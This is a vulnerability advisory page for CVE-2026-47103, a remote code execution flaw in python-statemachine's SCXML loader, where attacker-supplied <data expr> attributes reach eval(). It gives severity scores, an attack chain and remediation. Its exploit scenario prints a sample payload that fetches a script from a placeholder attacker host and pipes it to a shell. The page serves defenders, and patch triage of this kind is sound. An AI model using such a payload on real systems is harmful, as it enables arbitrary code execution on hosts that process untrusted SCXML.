Skip to main content

python-statemachine CVE-2026-47103

CRITICAL
Eval Injection (CWE-95)
2026-06-17 VulnCheck
Python Code Injection RCE Python Statemachine
9.3
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
9.3 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
vuln.today AI
9.8 CRITICAL

Attacker-supplied SCXML reaches eval() with no auth or interaction when the loader is used, yielding full code execution in-process, so AV:N/AC:L/PR:N/UI:N and C/I/A:H.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 15:35 vuln.today
Analysis Generated
Jun 17, 2026 - 15:35 vuln.today

DescriptionCVE.org

Python StateMachine versions 3.0.0 before 3.2.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary code by supplying malicious SCXML documents containing crafted <data expr="..."> attributes evaluated unsafely. The SCXMLProcessor passes attacker-controlled expression strings through a call chain ending in Python's built-in eval() without sandboxing, enabling arbitrary code execution in the context of the hosting process.

Articles & Coverage 1

News Critical RCE in Python python-statemachine 3.0.x SCXML eval() - CVE-2026-47103 Jun 17, 2026

AnalysisAI

Remote code execution in python-statemachine 3.0.0 through 3.1.x allows attackers to run arbitrary Python in the host process by supplying a crafted SCXML document whose <data expr="..."> attributes are passed unsandboxed to eval() inside SCXMLProcessor. Reported by VulnCheck with publicly available exploit code and a vendor advisory (GHSA-v4jc-pm6r-3vj8); no public exploit identified at time of analysis as actively in the wild, and the flaw is not listed in CISA KEV.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify app ingesting SCXML documents
Delivery
Craft SCXML with malicious <data expr> payload
Exploit
Submit document via upload or API
Execution
SCXMLProcessor passes expr to eval()
Persist
Arbitrary Python runs as service account
Impact
Establish persistence or pivot internally
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The hosting application must use the experimental, previously undocumented SCXML loader - specifically statemachine.io.scxml.SCXMLProcessor or any code path that parses a .scxml file - and must ingest that document from an untrusted or third-party source. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Vendor-issued CVSS 4.0 is 9.3 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) reflecting full confidentiality, integrity, and availability loss with no privileges or user interaction once a malicious SCXML document is processed. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker uploads or otherwise delivers an SCXML workflow file containing `<data id="x" expr="__import__('os').system('curl attacker/sh|sh')"/>` to an application that uses SCXMLProcessor to load third-party state-charts. When the host application parses the document, the expression is handed to eval() and executes immediately as the service account, yielding code execution with no authentication or user interaction. …
Remediation Vendor-released patch: upgrade to python-statemachine 3.2.0 or later (pip install --upgrade 'python-statemachine>=3.2.0'), which replaces the unsafe eval() path with a safe-by-default SCXML datamodel per GHSA-v4jc-pm6r-3vj8. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

24 hours: Inventory all systems running python-statemachine 3.0.0-3.1.x and determine which are exposed to untrusted SCXML input sources. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-48039 CRITICAL POC
9.1 Jun 11

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac
CVE-2026-53753 CRITICAL
9.8 Jun 16

Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in

CVE-2026-48519 CRITICAL
9.6 Jun 16

Remote code execution in Langflow versions through 1.9.1 allows unauthenticated attackers to execute arbitrary Python co
CVE-2026-45833 CRITICAL
9.4 Jun 12

Authenticated remote code execution in ChromaDB Python project versions 0.4.17 and later enables attackers holding the U
CVE-2026-53873 CRITICAL
9.3 Jun 17

Arbitrary code execution bypass in picklescan before 1.0.4 allows attackers to smuggle malicious pickle files past the s

Share

CVE-2026-47103 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy